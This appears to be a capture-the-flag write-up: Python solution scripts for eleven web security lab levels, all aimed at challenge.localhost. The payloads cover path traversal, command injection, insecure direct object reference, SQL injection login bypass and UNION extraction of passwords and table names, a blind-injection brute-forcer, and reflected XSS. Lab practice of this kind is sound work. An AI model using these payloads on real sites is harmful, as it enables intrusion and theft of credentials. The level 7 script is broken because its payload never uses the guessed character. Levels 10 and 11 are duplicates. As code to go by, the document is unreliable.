Web Security

level 1

import requests

response = requests.get("http://challenge.localhost?path=/flag")
print(response.text)

level 2

import requests

response = requests.get("http://challenge.localhost/?timezone=MST date")
print(response.text)

level 3

import requests

response = requests.get("http://challenge.localhost/?user=1")
print(response.text)

level 4

import requests

data={
	"username": 'flag" --',
	"password": 'flag'
}

response = requests.post("http://challenge.localhost/", data = data)
print(response.text)

level 5

import requests

params={
	"query": '" UNION SELECT password FROM users --'
}

response = requests.post("http://challenge.localhost/", params = params)
print(response.text)

level 6

import requests

params={
	"query": '" UNION SELECT tbl_name FROM sqlite_master --'
}

response = requests.post("http://challenge.localhost/", params = params)
print(response.text)
import requests

params={
	"query": '" UNION SELECT password FROM table9110909979364706165 --'
}

response = requests.post("http://challenge.localhost/", params = params)
print(response.text)

level 7

import string
import requests

searchspace = string.ascii_letters + string.digits + '{}._-'
solution = ''

while True:
	for char in searchspace:
		data = {
			"username": f'" OR SUBSTR(username, 1, 1 --',
			"password": 'flag'
		}
		
		response = requests.post("http://challenge.localhost/", data = data)
		if response.text.startswith("Hello"):
			solution += char
			print(solution)
			break

level 8

import requests

response = requests.get("http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=<script>alert(1)</script>")
print(response.text)

level 9

import requests

response = requests.get("http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=</textarea><script>alert(1)</script><textarea>")
print(response.text)

level 10

import requests

params = {
	"url": "http://challenge.localhost/leak"
}

response = requests.get("http://challenge.localhost/visit", params = params)
print(response.text)
import requests

params = {
	"user": 1
}

response = requests.get("http://challenge.localhost/info", params = params)
print(response.text)

level 11

import requests

params = {
	"url": "http://challenge.localhost/leak"
}

response = requests.get("http://challenge.localhost/visit", params = params)
print(response.text)
import requests

params = {
	"user": 1
}

response = requests.get("http://challenge.localhost/info", params = params)
print(response.text)

Last updated